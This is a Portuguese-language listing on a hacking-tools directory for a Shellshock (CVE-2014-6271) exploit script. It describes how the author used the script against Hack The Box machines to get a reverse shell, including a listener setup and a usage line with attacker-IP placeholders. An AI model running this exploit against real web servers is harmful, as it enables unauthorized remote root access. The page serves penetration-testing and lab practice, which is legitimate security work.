Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-6271 — Exploração Shellshock, também conhecida como CVE-2014-6271 | Kitploit
Ferramentas/GitHubGitHub/b4kesn4ke/cve-2014-6271
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubb4kesn4ke/cve-2014-6271

CVE-2014-6271

Exploração Shellshock, também conhecida como CVE-2014-6271

Ver Repositório
153há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-6271 - Shellshock.py

Exploit Shellshock também conhecido como CVE-2014-6271.
Testado no Bash 3.2 e Bash 4.2.
Para mais informações sobre a vulnerabilidade, visite: https://nvd.nist.gov/vuln/detail/CVE-2014-6271

Nota


O exploit foi principalmente testado no Hack The Box nos seguintes boxes:

  • Beep box : https://app.hackthebox.eu/machines/Beep
  • Shocker box : https://app.hackthebox.eu/machines/Shocker

Este exploit só funcionará em servidores web que tenham uma versão do Bash < 4.3.
Em alguns casos, se você conseguir obter um código HTTP 200 no seu navegador web
fazendo uma requisição GET para `/cgi-bin/`, você pode tentar executar o exploit contra esse diretório.

Caso contrário, se você tiver um 403 no diretório /cgi-bin/, tente enumerar arquivos
dentro desse diretório com uma boa wordlist, procurando por extensões .sh ou .cgi.


NOTA: Não se esqueça de configurar seu TCP listener, caso contrário o exploit pode te dar um falso positivo durante a verificação da chamada testRevShell

Prova de Conceito (POC)


Primeiramente, podemos ver os argumentos que o exploit aceita executando: shellshock.py -h

Exemplo 1

Depois podemos configurar um listener Ncat em uma porta de nossa escolha, aqui escolhi a 45

Exemplo 2

Em seguida, podemos executar o exploit fornecendo todos os argumentos que ele espera, executando:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
A URL alvo aqui, como você pode ver, é onde o servidor web envia uma requisição POST durante a autenticação naquela box

Aqui, como podemos ver na saída, o exploit tentou enviar o payload via SSL usando múltiplas versões TLS, até que teve sucesso

Exemplo 3

E aqui conseguimos nossa reverse shell! Por sorte, o servidor web estava rodando como root.

Exemplo 4

Baixar ferramenta